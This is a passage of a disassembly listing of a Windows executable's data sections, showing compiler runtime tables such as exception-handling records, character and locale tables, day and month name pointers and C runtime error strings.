		dd 1CEACh, 1CEDEh, 1CF13h, 1CF4Eh, 1CF83h, 0
dword_4227E0	dd 2 dup(0)		; DATA XREF: sub_40B602+2o
					; sub_40B602+7o
dword_4227E8	dd 2 dup(0)		; DATA XREF: sub_40B626+2o
					; sub_40B626+7o
dword_4227F0	dd 0			; DATA XREF: sub_402C47+29o
		dd offset sub_402BDB
		dd 0
		dd offset dword_42282C
		dd 0FFFFFFFFh, 41CD5Bh
dword_422808	dd 19930522h, 1, 422800h, 5 dup(0) ; DATA XREF:	.text:0041CD74o
		dd 1
dword_42282C	dd 3, 42283Ch, 422E90h,	422EACh, 0 ; DATA XREF:	zcrshv4o:004227FCo
		dd offset off_424008
		align 8
		dd 0FFFFFFFFh, 0
		dd 28h,	402C86h
dword_422858	dd 0FFFFFFFEh, 0	; DATA XREF: sub_402FD3+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403065
		align 8
dword_422878	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403373+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4033A9
		align 8
dword_422898	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4036BE+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403778
		align 8
dword_4228B8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403795+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4038DA
		align 8
dword_4228D8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403A52+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 3Ah,	40h, 0
		align 8
dword_4228F8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403B91+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403BE7
		align 8
dword_422918	dd 0FFFFFFFEh, 0	; DATA XREF: sub_403C1F+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_403C65
		align 8
dword_422938	dd 0FFFFFFFEh, 0	; DATA XREF: sub_404248+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_404305
		align 8
dword_422958	dd 0FFFFFFFEh, 0	; DATA XREF: .text:00404504o
		dd 0FFFFFF80h, 0
		dd 0FFFFFFFEh, 4046C9h,	4046CDh, 0FFFFFFFEh, 40468Fh, 4046A3h
dword_422980	dd 0FFFFFFFEh, 0	; DATA XREF: sub_404F60+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_404FF8
		align 10h
dword_4229A0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405229+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40538A
		align 10h
dword_4229C0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405671+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4056DB
		align 10h
dword_4229E0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405826+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_4058D1
		align 10h
dword_422A00	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405975+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_405A7E
		dd 0FFFFFFFEh, 0
		dd offset sub_405A8A
dword_422A28	dd 0FFFFFFFEh, 0	; DATA XREF: sub_405EF4+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_405FAE
		align 8
dword_422A48	dd 0FFFFFFFEh, 0	; DATA XREF: sub_407FCB+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset loc_408081
		align 8
dword_422A68	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408515+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40857C
		align 8
dword_422A88	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408A61+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_408B7B
		align 8
dword_422AA8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_408DA0+2o
		dd 0FFFFFF8Ch, 0
		dd 0FFFFFFFEh, 408FC9h,	408FCDh, 0
dword_422AC8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_4090A1+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_409164
		align 8
dword_422AE8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40923E+2o
		db 0CCh
		db 3 dup(0FFh)
		align 8
		dd 0FFFFFFFEh, 0
		dd offset sub_40930F
		dd 2 dup(0)
		dd offset sub_4092DB
dword_422B10	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40A90F+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40A9E1
		align 10h
dword_422B30	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B85C+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40B91C
		align 10h
		dd offset loc_40B8DE
		dd offset loc_40B8E8
dword_422B58	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40B982+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40B9C5h,	40B9CEh, 40h, 2	dup(0)
		dd offset sub_40BAA5
		dd 0FFFFFFFFh, 0
		dd 0FFFFFFFFh, 3 dup(0)
		dd 2 dup(1), 422B74h
dword_422BA8	dd 19930522h, 2, 422B84h, 1, 422B94h, 3	dup(0) ; DATA XREF: .text:0041CD8Fo
		dd 1, 0
dword_422BD0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BABD+2o
		dd 0FFFFFFB4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40BBDD
		align 10h
		dd offset loc_40BB4D
		dd offset loc_40BB56
dword_422BF8	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BC59+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 40BDC4h,	40BDC8h, 0
dword_422C18	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40BDD8+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40BE5Dh,	40BE61h
dword_422C34	dd 0			; DATA XREF: sub_40BFC7+162o
		dd offset sub_40B78F
		align 10h
		dd offset dword_422C44
dword_422C44	dd 2, 422C50h, 422EACh,	0 ; DATA XREF: zcrshv4o:00422C40o
		dd offset off_424E50
		dd 0
		dd 0FFFFFFFFh, 0
		dd 0Ch,	40C31Dh, 0
dword_422C70	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40C419+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40C439h,	40C43Dh, 0
dword_422C90	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40C465+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40C489h,	40C48Dh, 0
dword_422CB0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D0D4+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 40D15Ah,	40D171h, 0
dword_422CD0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D212+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 40D258h,	40D26Ch, 0
dword_422CF0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D301+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40D410
		align 10h
dword_422D10	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40D9E0+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40DAB2
		align 10h
dword_422D30	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40DF0F+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E006
		align 10h
dword_422D50	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E02D+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E16B
		align 10h
dword_422D70	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E2E9+2o
		dd 0FFFFFFC0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E457
		align 10h
dword_422D90	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40E593+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40E629
		align 10h
dword_422DB0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40EC70+2o
		db 0CCh
		db 3 dup(0FFh)
		align 10h
		dd 0FFFFFFFEh, 0
		dd offset sub_40ED09
		align 10h
dword_422DD0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F3AE+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F440
		align 10h
dword_422DF0	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F470+2o
		dd 0FFFFFFC8h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F606
		dd 2 dup(0)
		dd offset sub_40F53D
dword_422E18	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40F60F+2o
		dd 0FFFFFFD0h, 0
		dd 0FFFFFFFEh, 0
		dd offset sub_40F6E6
		align 8
dword_422E38	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40FD49+2o
		dd 0FFFFFFD4h, 0
		dd 0FFFFFFFEh, 40FD66h,	40FD82h, 0
dword_422E58	dd 0FFFFFFFEh, 0	; DATA XREF: sub_41069A+2o
		dd 0FFFFFFD8h, 0
		dd 0FFFFFFFEh, 4106C7h,	4106E3h, 0
		dd offset off_428380
		align 10h
		dd 0FFFFFFFFh, 0
		dd 28h,	4013CEh, 0
		dd offset off_4283A0
		dd 0
		dd 0FFFFFFFFh, 0
		dd 28h,	4013E6h, 0
		dd offset off_4283C0
		align 8
		dd 0FFFFFFFFh, 0
dword_422EC0	dd 0Ch,	403200h, 3, 422E74h, 422E90h, 422EACh
					; DATA XREF: zcrshv4o:00422EE4o
dword_422ED8	dd 0			; DATA XREF: sub_40121E+48o
					; sub_4016BA+48o ...
		dd offset loc_4010E1
		dd 0
		dd offset dword_422EC0+8
		dd 0
		dd offset off_4283DC
		dd 0
		dd 0FFFFFFFFh, 0
dword_422EFC	dd 0Ch,	401637h, 2, 422EE8h, 422EACh ; DATA XREF: zcrshv4o:00422F1Co
dword_422F10	dd 0			; DATA XREF: sub_4015ED+34o
					; sub_4035D9+54o
		dd offset sub_401038
		dd 0
		dd offset dword_422EFC+8
dword_422F20	dd 0FFFFFFFEh, 0	; DATA XREF: sub_41A390+2o
		dd 0FFFFFFB4h, 0
		dd 0FFFFFFFEh, 5 dup(0)
		dd 0FFFFFFFFh, 41CDFAh
dword_422F50	dd 19930522h, 1, 422F48h, 5 dup(0) ; DATA XREF:	.text:0041CE15o
		dd 1, 0FFFFFFFFh, 41CE1Fh
dword_422F7C	dd 19930522h, 1, 422F74h, 5 dup(0) ; DATA XREF:	.text:0041CE3Ao
		dd 1, 0FFFFFFFFh, 41CE44h
dword_422FA8	dd 19930522h, 1, 422FA0h, 5 dup(0) ; DATA XREF:	.text:0041CE75o
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 0FFFFFFFFh, 0
		dd 1, 0
		dd 1, 0
		dd 40h,	2 dup(0)
		dd offset sub_40150F
		dd 40h,	2 dup(0)
		dd offset loc_40149D
		dd 2 dup(2), 3,	1, 422FF0h, 2 dup(0)
		dd 3, 1, 423000h
dword_423038	dd 19930522h, 4, 422FD0h, 2, 423010h, 3	dup(0) ; DATA XREF: sub_41CD99+11o
		dd 1, 0
		dd 0FFFFFFFFh, 41CDB4h
dword_423068	dd 19930522h, 1, 423060h, 5 dup(0) ; DATA XREF:	.text:0041CDCDo
		dd 1, 0
		dd 0FFFFFFFFh, 41CDD7h
dword_423098	dd 19930522h, 1, 423090h, 5 dup(0) ; DATA XREF:	.text:0041CDF0o
		dd 1, 0
		dd 0FFFFFFFFh, 41CE7Fh
dword_4230C8	dd 19930522h, 1, 4230C0h, 5 dup(0) ; DATA XREF:	.text:0041CE98o
		dd 1, 0
		dd 0FFFFFFFFh, 41CEA2h
dword_4230F8	dd 19930522h, 1, 4230F0h, 5 dup(0) ; DATA XREF:	.text:0041CEC7o
		dd 1, 0
		dd 0FFFFFFFFh, 41CED1h
dword_423128	dd 19930522h, 1, 423120h, 5 dup(0) ; DATA XREF:	.text:0041CEFCo
		dd 1, 0
		dd 0FFFFFFFFh, 41CF06h
dword_423158	dd 19930522h, 1, 423150h, 5 dup(0) ; DATA XREF:	.text:0041CF37o
		dd 1, 0
		dd 0FFFFFFFFh, 41CF41h
dword_423188	dd 19930522h, 1, 423180h, 5 dup(0) ; DATA XREF:	.text:0041CF6Co
		dd 1, 0
		dd 0FFFFFFFFh, 41CF76h
dword_4231B8	dd 19930522h, 1, 4231B0h, 5 dup(0) ; DATA XREF:	.text:0041CFA1o
		dd 1, 389h dup(0)
zcrshv4o	ends

; Section 3. (virtual address 00024000)
; Virtual size			: 00016000 (  90112.)
; Section size in file		: 00016000 (  90112.)
; Offset to raw	data for section: 00024000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 424000h
		dd offset dword_41E320
		dd offset dword_41E320
off_424008	dd offset off_41E3AC	; DATA XREF: zcrshv4o:0042207Co
					; zcrshv4o:004220A4o ...
		align 10h
a_?avout_of_ran	db '.?AVout_of_range@std@@',0
		align 4
		dd offset dword_41E320
		dd offset dword_41E320
off_424030	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004220E0o
					; zcrshv4o:00422100o
		align 8
a_?avtype_info@	db '.?AVtype_info@@',0
off_424048	dd offset dword_41E320	; DATA XREF: sub_4035C0+3o
		align 10h
dword_424050	dd 2			; DATA XREF: sub_40A074+42r
					; sub_40A214+19r ...
		align 10h
		dd offset sub_40B6DE
dword_424064	dd 0CAF23A5Ah		; DATA XREF: sub_401DED+9r
					; sub_401E90+9r ...
dword_424068	dd 350DC5A5h		; DATA XREF: sub_404C4E+AEr
					; sub_40B64A+29w ...
		align 10h
dword_424070	dd 0FFFFFFFFh, 16h dup(0) ; DATA XREF: sub_404D81+29o
					; sub_404F60+63o ...
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	31h dup(0)
		dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
		dd 76757473h, 7A797877h, 0
		db    0
		align 2
aAbcdefghijklmn	db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
		align 4
		dd 21h dup(0)
byte_424290	db 0			; DATA XREF: sub_405229+102w
		align 4
		dd 0Fh dup(0)
		dd 10100000h, 6	dup(10101010h),	0
		dd 20200000h, 6	dup(20202020h),	2 dup(0)
		dd 20h,	10000000h, 10001000h, 2	dup(0)
		dd 20000000h, 20002000h, 10h, 0
		dd 20000000h, 2	dup(0)
		dd 200000h, 20000000h, 0
		dd 10101000h, 5	dup(10101010h),	10101000h, 10101010h, 6	dup(20202020h)
		dd 20202000h, 20202020h, 20h, 0
byte_424398	db 0			; DATA XREF: sub_405229+11Ew
		align 4
		dd 0Fh dup(0)
		dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
		dd 77767574h, 7A7978h, 0
		dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
		dd 57565554h, 5A5958h, 0
		dd 83000000h, 0
		dd 9A0000h, 9E009Ch, 2 dup(0)
		dd 8A0000h, 0FF8E008Ch,	2 dup(0)
		dd 0AA0000h, 2 dup(0)
		dd 0B500h, 0BA0000h, 0
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
		dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
		dd 9FDEDDDCh
dword_424498	dd 0A02980h		; DATA XREF: sub_402CAD+41r
					; sub_404F60+4Cr ...
byte_42449C	db 1			; DATA XREF: sub_40507E+E3r
		db 2, 4, 8
dword_4244A0	dd 3A4h			; DATA XREF: sub_40507E:loc_4050BAr
dword_4244A4	dd 82798260h		; DATA XREF: sub_40507E+12Br
		dd 21h,	0
dword_4244B0	dd 0DFA6h		; DATA XREF: sub_40507E+C6r
		align 8
		dd 0A5A1h, 0
		dd 0FCE09F81h, 0
		dd 0FC807E40h, 0
		dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE40h, 0
		dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE41h, 0
		dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
		dd 0FE81h, 0
		dd 0FEA17E40h, 0
		dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
		dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
		dd offset dword_41EF60+4
dword_424594	dd 0FFFFFFFEh		; DATA XREF: sub_402CAD+2Cr
					; sub_402CAD+4Cr ...
dword_424598	dd 43h,	0		; DATA XREF: sub_4053E1:loc_4054DEo
					; sub_405521:loc_40556Co ...
dword_4245A0	dd 2, 15h dup(0)	; DATA XREF: sub_405633+28o
					; sub_405975+DAo ...
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd offset dword_424598
		dd 3 dup(0)
		dd 2 dup(1), 3 dup(0)
		dd offset off_424F38
		dd 2 dup(0)
off_424668	dd offset asc_41ED60	; DATA XREF: sub_40F73F+Dr
					; sub_40F7BC+Dr ...
					; "	    (((((		   H"
		dd offset dword_41F168+80h
		dd offset dword_41F168+200h
		dd offset off_424E78
off_424678	dd offset dword_4245A0	; DATA XREF: sub_402CAD+24r
					; sub_405671+4Er ...
		dd 1
off_424680	dd offset dword_4245A0	; DATA XREF: sub_40AC16+17o
		dd offset dword_424070
dword_424688	dd 0Eh			; DATA XREF: sub_4056E7+13r
					; sub_405753+13r ...
dword_42468C	dd 0Dh			; DATA XREF: sub_4056E7+1r
					; sub_4056E7+1Er ...
dword_424690	dd 1			; DATA XREF: sub_405D58:loc_405D5Er
dword_424694	dd 16h			; DATA XREF: sub_405D58:loc_405D79r
		dd 2 dup(2), 3,	2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
		dd 9, 0Ch, 0Ah,	7, 0Bh,	8, 0Ch,	16h, 0Dh, 16h, 0Fh, 2
		dd 10h,	0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h,	2, 41h
		dd 0Dh,	43h, 2,	50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
		dd 59h,	0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h,	9, 6, 16h
		dd 80h,	0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
		dd 29h,	9Eh, 0Dh, 0A1h,	2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
		dd 11h,	0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4247F8	dd 0Ch			; DATA XREF: sub_405D93+9o
dword_4247FC	dd 8			; DATA XREF: sub_405DA6+9o
off_424800	dd offset dword_428938	; DATA XREF: sub_405E41:loc_405E7Ew
					; sub_405E8A+8o ...
dword_424804	dd 1			; DATA XREF: sub_405E41:loc_405E4Ar
		dd offset dword_428950
		dd 1, 2	dup(0)
		dd offset dword_428968
		dd 1, 428980h, 1, 2 dup(0)
		dd offset dword_428998
		dd 1, 4289B0h, 1, 4289C8h, 1, 2	dup(0)
		dd offset dword_4289E0
		dd 1, 2	dup(0)
		dd offset dword_4289F8
		dd 1, 428A10h, 1, 428A28h, 1, 2	dup(0)
		dd offset dword_428A40
		dd 1, 428A58h, 1, 428A70h, 1, 22h dup(0)
dword_424920	dd 10h			; DATA XREF: sub_405E8A+2Ao
					; sub_405E8A+4Ao
off_424924	dd offset aNull_0	; DATA XREF: sub_406F97:loc_407485r
					; sub_406F97+7E7r
					; "(null)"
off_424928	dd offset aNull		; DATA XREF: sub_406F97+433r
					; "(null)"
		align 10h
off_424930	dd offset sub_4080AA	; DATA XREF: sub_407E1D+Er
					; sub_4080D9+45w
		align 10h
		dd offset dword_41E320
		align 10h
off_424950	dd offset dword_437FE0	; DATA XREF: sub_408644o
					; sub_40864A+52o ...
		align 8
		dd offset dword_437FE0
		dd 101h
dword_424960	dd 0FFFFFFFEh, 0	; DATA XREF: sub_40864A+74o
		dd 1000h, 4 dup(0)
		dd 2, 0FFFFFFFEh, 6 dup(0)
		dd 2, 0FFFFFFFEh, 7 dup(0)
dword_4249C0	dd 7Ch dup(0)		; DATA XREF: sub_40864A+A4o
dword_424BB0	dd 8 dup(0)		; DATA XREF: sub_40871B+Do
					; sub_40876D+Do
dword_424BD0	dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA	XREF: sub_403795:loc_403831o
					; sub_403795:loc_403876o ...
dword_424C00	dd 2			; DATA XREF: sub_40A074:loc_40A080r
off_424C04	dd offset aR6002FloatingP ; DATA XREF: sub_40A074:loc_40A1A4r
					; "R6002\r\n- floating point not loaded\r\n"
		dd 8, 41EAB4h, 9, 41EA88h, 0Ah,	41E9F0h, 10h, 41E9C4h
		dd 11h,	41E994h, 12h, 41E970h, 13h, 41E944h, 18h, 41E90Ch
		dd 19h,	41E8E4h, 1Ah, 41E8ACh, 1Bh, 41E874h, 1Ch, 41E84Ch
		dd 1Eh,	41E82Ch, 1Fh, 41E7C8h, 20h, 41E790h, 21h, 41E698h
		dd 22h,	41E5F8h, 78h, 41E5E8h, 79h, 41E5D8h, 7Ah, 41E5C8h
		dd 0FCh, 41E5C4h, 0FFh,	41E5B4h
byte_424CB8	db 0			; DATA XREF: sub_40A36D:loc_40A6CEr
					; sub_40A36D+36Fr
		align 4
		dd 2Fh dup(0)
		dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2	dup(0)
dword_424DB8	dd 1B3Fh		; DATA XREF: sub_40AF03+Dr
		align 10h
dword_424DC0	dd 0C0000005h, 0Bh, 0	; DATA XREF: sub_405826+1Do
					; sub_405975+6Eo
		dd 0C000001Dh, 4, 0
		dd 0C0000096h, 4, 0
		dd 0C000008Dh, 8, 0
		dd 0C000008Eh, 8, 0
		dd 0C000008Fh, 8, 0
		dd 0C0000090h, 8, 0
		dd 0C0000091h, 8, 0
		dd 0C0000092h, 8, 0
		dd 0C0000093h, 8, 0
dword_424E38	dd 3			; DATA XREF: sub_40AFD5+A1r
					; sub_40AFD5+C0r ...
dword_424E3C	dd 7			; DATA XREF: sub_40AFD5+A7r
					; sub_40AFD5+C6r ...
		dd 78h
dword_424E44	dd 0Ah			; DATA XREF: sub_40AFD5+22r
					; sub_40E2A8+4r
		dd offset dword_41E320
		dd offset sub_40B6DE
off_424E50	dd offset off_41E3AC	; DATA XREF: sub_40BFC7+128o
					; zcrshv4o:00422128o ...
		align 8
a_?avbad_except	db '.?AVbad_exception@std@@',0
		dd offset asc_41ED60	; "	    (((((		   H"
		dd offset dword_41EF60+2
off_424E78	dd offset aSun		; DATA XREF: sub_4053E1+D9o
					; .data:00424674o
					; "Sun"
		dd offset aMon		; "Mon"
		dd offset aTue		; "Tue"
		dd offset aWed		; "Wed"
		dd offset aThu		; "Thu"
		dd offset aFri		; "Fri"
		dd offset aSat		; "Sat"
		dd offset aSunday	; "Sunday"
		dd offset aMonday	; "Monday"
		dd offset aTuesday	; "Tuesday"
		dd offset aWednesday	; "Wednesday"
		dd offset aThursday	; "Thursday"
		dd offset aFriday	; "Friday"
		dd offset aSaturday	; "Saturday"
		dd offset aJan		; "Jan"
		dd offset aFeb		; "Feb"
		dd offset aMar		; "Mar"
		dd offset aApr		; "Apr"
		dd offset aMay		; "May"
		dd offset aJun		; "Jun"
		dd offset aJul		; "Jul"
		dd offset aAug		; "Aug"
		dd offset aSep		; "Sep"
		dd offset aOct		; "Oct"
		dd offset aNov		; "Nov"
		dd offset aDec		; "Dec"
		dd offset aJanuary	; "January"
		dd offset aFebruary	; "February"
		dd offset aMarch	; "March"
		dd offset aApril	; "April"
		dd offset aMay		; "May"
		dd offset aJune		; "June"
		dd offset aJuly		; "July"
		dd offset aAugust	; "August"
		dd offset aSeptember	; "September"
		dd offset aOctober	; "October"
		dd offset aNovember	; "November"
		dd offset aDecember	; "December"
		dd offset aAm		; "AM"
		dd offset aPm		; "PM"
		dd offset aMmDdYy	; "MM/dd/yy"
		dd offset aDdddMmmmDdYyyy ; "dddd, MMMM	dd, yyyy"
		dd offset dword_41F168+300h
		dd 409h, 2 dup(1), 424E78h
dword_424F34	dd 2Eh			; DATA XREF: .data:off_424F38o
off_424F38	dd offset dword_424F34	; DATA XREF: sub_4053E1+14o
					; sub_40CC84+Br ...
off_424F3C	dd offset dword_428F38	; DATA XREF: sub_40CC84+1Dr
off_424F40	dd offset dword_428F38	; DATA XREF: sub_40CC84+2Fr
off_424F44	dd offset dword_428F38	; DATA XREF: sub_40CCC4+Cr
off_424F48	dd offset dword_428F38	; DATA XREF: sub_40CCC4+1Er
off_424F4C	dd offset dword_428F38	; DATA XREF: sub_40CCC4+30r
off_424F50	dd offset dword_428F38	; DATA XREF: sub_40CCC4+42r
off_424F54	dd offset dword_428F38	; DATA XREF: sub_40CCC4+54r
off_424F58	dd offset dword_428F38	; DATA XREF: sub_40CCC4+66r
off_424F5C	dd offset dword_428F38	; DATA XREF: sub_40CCC4+78r
		dd 2 dup(7F7F7F7Fh), 424F38h, 1, 2Eh, 1, 2 dup(0)
off_424F80	dd offset sub_41190A	; DATA XREF: sub_40DB5E:loc_40DB62r
					; sub_40FCCB+5w
off_424F84	dd offset sub_411006	; DATA XREF: sub_40FCCB+Aw
off_424F88	dd offset sub_410FC4	; DATA XREF: sub_40FCCB+14w
off_424F8C	dd offset sub_410FF8	; DATA XREF: sub_40FCCB+1Ew
off_424F90	dd offset word_410F6E	; DATA XREF: sub_40FCCB+28w
off_424F94	dd offset sub_41190A	; DATA XREF: sub_40FCCB+32w
off_424F98	dd offset sub_411884	; DATA XREF: sub_406F97+61Ar
					; sub_40FCCB+37w
off_424F9C	dd offset sub_410F84	; DATA XREF: sub_409427+5F1r
					; sub_40FCCB+41w
off_424FA0	dd offset sub_410EEE	; DATA XREF: sub_406F97+65Fr
					; sub_40FCCB+4Bw
off_424FA4	dd offset sub_410E7D	; DATA XREF: sub_406F97+640r
					; sub_40FCCB+55w
		align 10h
dword_424FB0	dd 19930520h, 3	dup(0)	; DATA XREF: sub_40F214+2o
					; sub_40F21D+2o
dword_424FC0	dd 2694h		; DATA XREF: sub_4103B4+3r
					; sub_410407+5Dr
		dd 9875h, 9873h, 0
dword_424FD0	dd 14h			; DATA XREF: sub_410316:loc_41031Er
off_424FD4	dd offset aExp		; DATA XREF: sub_410316:loc_41038Er
					; "exp"
		dd 1Dh,	41EC38h, 1Ah, 41EC28h, 1Bh, 41EC2Ch, 1Fh, 41FE30h
		dd 13h,	41FE28h, 21h, 41FE20h, 0Eh, 41EC20h, 0Dh, 41EC18h
		dd 0Fh,	41EBFCh, 10h, 41FE18h, 5, 41FE10h, 1Eh,	41EBE0h
		dd 12h,	41EBDCh, 20h, 41EBD8h, 0Ch, 41EBF4h, 0Bh, 41EBECh
		dd 15h,	41FE08h, 1Ch, 41EBE4h, 19h, 41FE00h, 11h, 41FDF8h
		dd 18h,	41FDF0h, 16h, 41FDE8h, 17h, 41FDE0h, 22h, 41FDDCh
		dd 23h,	41FDD8h, 24h, 41FDD4h, 25h, 41FDCCh, 26h, 41FDC0h
dbl_4250B8	dq 1.797693134862316e308 ; DATA	XREF: sub_4100E0:loc_4101B0r
					; sub_4100E0:loc_4101B8r
		dd 0
		dd 0FFF80000h
dbl_4250C8	dq 1.797693134862316e308 ; DATA	XREF: sub_4100E0+89r
					; sub_4100E0+A4r ...
		dd 0
		dd 100000h, 0
		dd 80000000h
tbyte_4250E0	dt 2.3562723457267347066e313 ; DATA XREF: sub_410644+Br
					; sub_410644+1Er
		align 4
tbyte_4250EC	dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410644+30r
		align 4
dword_4250F8	dd 1			; DATA XREF: sub_41069A+1Cr
					; sub_41069A+4Cw
byte_4250FC	db 3			; DATA XREF: sub_41077D+1Br
					; sub_41077D:loc_4107BBr
		align 10h
		dd 7080h, 1, 0FFFFF1F0h, 0
dword_425110	dd 545350h, 0Fh	dup(0)	; DATA XREF: .data:00425190o
dword_425150	dd 544450h, 0Fh	dup(0)	; DATA XREF: .data:00425194o
		dd offset dword_425110
		dd offset dword_425150
		dd 0FFFFFFFFh, 2 dup(0)
		dd 0FFFFFFFFh, 2 dup(0)
		dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h,	0B5h, 0D4h, 0F3h
